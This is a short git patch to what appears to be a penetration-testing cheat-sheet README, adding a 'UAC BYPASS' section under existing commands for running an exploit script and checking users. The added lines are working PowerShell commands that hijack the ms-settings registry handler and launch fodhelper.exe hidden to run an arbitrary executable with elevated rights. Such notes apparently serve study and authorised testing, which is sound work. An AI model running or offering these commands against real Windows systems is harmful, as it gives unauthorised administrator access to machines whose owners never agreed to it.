From 85e5f3e96c0a0b9790078fa99108f69f0da02594 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Thu, 22 Sep 2022 00:30:06 -0400
Subject: [PATCH] Update README.md

---
 README.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/README.md b/README.md
index fc99917..ca7c167 100644
--- a/README.md
+++ b/README.md
@@ -889,6 +889,13 @@ python3 exploit.py
 # Check user and groups
 whoami
 net user {USERNAME}
+
+# UAC BYPASS
+ New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value {C:\Path\to\Exploit\exploit.exe} -Force
+New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
+cmd -> fodhelper
+
+powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden
 ```
 
 #### Credential Access